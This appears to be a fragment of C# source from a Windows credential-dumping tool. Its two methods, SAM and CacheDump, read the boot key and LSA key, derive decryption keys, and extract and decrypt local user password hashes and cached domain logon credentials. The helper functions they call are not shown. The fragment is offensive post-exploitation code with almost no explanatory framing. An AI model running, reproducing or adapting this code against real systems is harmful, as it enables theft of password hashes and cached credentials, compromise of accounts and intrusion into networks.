//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal SAM() { Byte[] bootKey = LSASecrets.GetBootKey(); Console.WriteLine("[+] BootKey: {0}", System.BitConverter.ToString(bootKey).Replace("-", "")); Byte[] hBootKey = GetHBootKey(bootKey); Console.WriteLine("[+] HBootKey: {0}", System.BitConverter.ToString(hBootKey).Replace("-", "")); UserKeys[] userKeys = GetUserHashes(hBootKey); DecryptUserHashes(ref userKeys, hBootKey); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal CacheDump() { String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount"); Console.WriteLine("[*] {0} Cached Logons Set", logonCount); Byte[] bootKey = LSASecrets.GetBootKey(); Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", "")); Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey); Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", "")); Byte[] nlkm = GetNlkm(lsaKey); Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", "")); GetCache(nlkm); }